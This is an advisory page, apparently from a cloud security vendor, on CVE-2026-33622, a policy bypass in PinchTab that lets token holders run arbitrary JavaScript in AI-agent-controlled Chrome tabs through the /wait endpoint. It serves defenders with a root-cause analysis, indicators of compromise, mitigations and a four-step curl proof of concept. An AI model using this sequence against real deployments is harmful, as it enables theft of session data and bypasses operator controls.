CVE-2026-33622: 
vulnerability analysis and mitigation

Overview

CVE-2026-33622 is a security policy bypass vulnerability in PinchTab, a standalone HTTP server that gives AI agents direct control over a Chrome browser. Affecting versions v0.8.3 through v0.8.5, the flaw allows authenticated callers to execute arbitrary JavaScript in a browser tab context via the POST /wait and POST /tabs/{id}/wait endpoints using fn mode, even when the security.allowEvaluate setting is explicitly disabled. The vulnerability was published on March 22, 2026, by researcher Yesuhei and reviewed by the GitHub Advisory Database on March 24, 2026. It carries a CVSS v3.1 score of 8.8 (High) and a CVSS v4.0 score of 6.1 (Medium/Moderate) (GitHub Advisory, PinchTab Advisory).

Technical details

The root cause is an inconsistent enforcement of the security.allowEvaluate policy guard across HTTP endpoints (CWE-94: Code Injection; CWE-284: Improper Access Control; CWE-693: Protection Mechanism Failure). While POST /evaluate correctly checks evaluateEnabled() and returns HTTP 403 with evaluate_disabled when the policy is off, the handleWaitCore function in wait.go omits this check entirely. In fn mode, the handler interpolates the caller-supplied req.Fn string directly into a JavaScript template via fmt.Sprintf and passes it to chromedp.Evaluate, executing it in the live browser tab context without any policy validation. Exploitation requires network access to the PinchTab server and a valid API bearer token, but no additional privileges beyond that (GitHub Advisory, PinchTab Advisory).

Impact

A successful exploit allows an authenticated attacker to execute arbitrary JavaScript within any reachable Chrome browser tab managed by PinchTab, bypassing the operator's explicit security.allowEvaluate = false configuration. This enables reading or exfiltrating sensitive data from browser memory and page state (e.g., session tokens, form data, cookies accessible via JavaScript), modifying page content, and performing actions on behalf of authenticated users within those browser sessions. The inconsistency between /evaluate and /wait policy enforcement makes the configured security boundary unreliable, undermining operator trust in the access control model (GitHub Advisory).

Exploitability

A proof-of-concept exploit consisting of a complete 4-step curl command sequence is publicly available in the official security advisory, demonstrating arbitrary JavaScript execution on a real PinchTab deployment (PinchTab Advisory). Feedly threat intelligence rates the PoC confidence as high and classifies it as a real exploit. There is no evidence of in-the-wild exploitation at this time, and no threat actor attribution has been reported. The EPSS score is approximately 0.095% (0.134% per GitHub Advisory), placing it in the 33rd percentile for exploitation likelihood within 30 days. The vulnerability is not listed in the CISA KEV catalog (GitHub Advisory).

Exploitation steps

  1. Obtain API token: Acquire a valid PinchTab server bearer token — this is a prerequisite, as the vulnerability is not an authentication bypass.
  2. Confirm policy enforcement on /evaluate: Send a POST request to /evaluate to verify that security.allowEvaluate is disabled and the endpoint returns {"code": "evaluate_disabled"}:
    curl -s -X POST http://localhost:9867/evaluate \
      -H "Authorization: Bearer <TOKEN>" \
      -H "Content-Type: application/json" \
      -d '{"expression":"1+1"}'
  3. Open or identify a target tab: Navigate to a target URL to create a tab context, capturing the returned tabId:
    curl -s -X POST http://localhost:9867/navigate \
      -H "Authorization: Bearer <TOKEN>" \
      -H "Content-Type: application/json" \
      -d '{"url":"https://example.com"}'
  4. Execute arbitrary JavaScript via /wait fn mode: Send a POST to /wait with a malicious fn expression (e.g., to set a global variable, exfiltrate data, or manipulate page state):
    curl -s -X POST http://localhost:9867/wait \
      -H "Authorization: Bearer <TOKEN>" \
      -H "Content-Type: application/json" \
      -d '{"tabId":"<TAB_ID>","fn":"(function(){window._poc_executed=true;return true})()","timeout":5000}'
  5. Verify execution: Confirm the side effect persisted in the browser tab context, demonstrating successful policy bypass:
    curl -s -X POST http://localhost:9867/wait \
      -H "Authorization: Bearer <TOKEN>" \
      -H "Content-Type: application/json" \
      -d '{"tabId":"<TAB_ID>","fn":"window._poc_executed === true","timeout":3000}'
    Expected response: {"waited": true, "elapsed": 0, "match": "fn"} (PinchTab Advisory).

Indicators of compromise

  • Network: Unexpected or anomalous HTTP POST requests to /wait or /tabs/{id}/wait endpoints on the PinchTab server (default port 9867) containing a fn field with JavaScript expressions beyond simple boolean predicates; requests to these endpoints from IP addresses not associated with authorized AI agent infrastructure.
  • Logs: PinchTab access logs showing POST requests to /wait with fn payloads containing function expressions, IIFE patterns (e.g., (function(){...})()), or references to sensitive browser APIs (document.cookie, localStorage, fetch); absence of corresponding evaluate_disabled errors despite security.allowEvaluate = false being configured.
  • Browser/Tab State: Unexpected global variables or modified DOM state in managed Chrome tabs (e.g., window._poc_executed, injected script tags, or altered page content) not attributable to normal agent workflows; unauthorized navigation events or form submissions originating from the browser context.

Mitigation and workarounds

As of the advisory publication date (March 22, 2026), no patched release was available, though a fix had been developed in the current worktree applying the same security.allowEvaluate policy check to fn mode in /wait endpoints. Operators should monitor the PinchTab repository for a patched release and upgrade immediately when available. In the interim, restrict network access to the PinchTab server to trusted hosts only, limit distribution of the server API token to the minimum necessary operators, and consider disabling or blocking the /wait and /tabs/{id}/wait endpoints at the network layer if fn mode is not required for operations (GitHub Advisory, PinchTab Advisory).

Community reactions

The vulnerability was reported by researcher Yesuhei and published by maintainer luigi-agosti via the official GitHub Security Advisory on March 22, 2026. Coverage has appeared on vulnerability tracking platforms including cvefeed.io, vuldb.com, and db.gcve.eu, as well as a dedicated write-up on infinitsec.net. No significant broader media coverage or notable social media discussion has been identified beyond standard vulnerability database aggregation (GitHub Advisory).

Additional resources


Source: This report was generated using AI

Free Vulnerability Assessment

Benchmark your Cloud Security Posture

Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.

Request assessment

Get a personalized demo

Ready to see Wiz in action?

"Best User Experience I have ever seen, provides full visibility to cloud workloads."
David EstlickCISO
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
Adam FletcherChief Security Officer
"We know that if Wiz identifies something as critical, it actually is."
Greg PoniatowskiHead of Threat and Vulnerability Management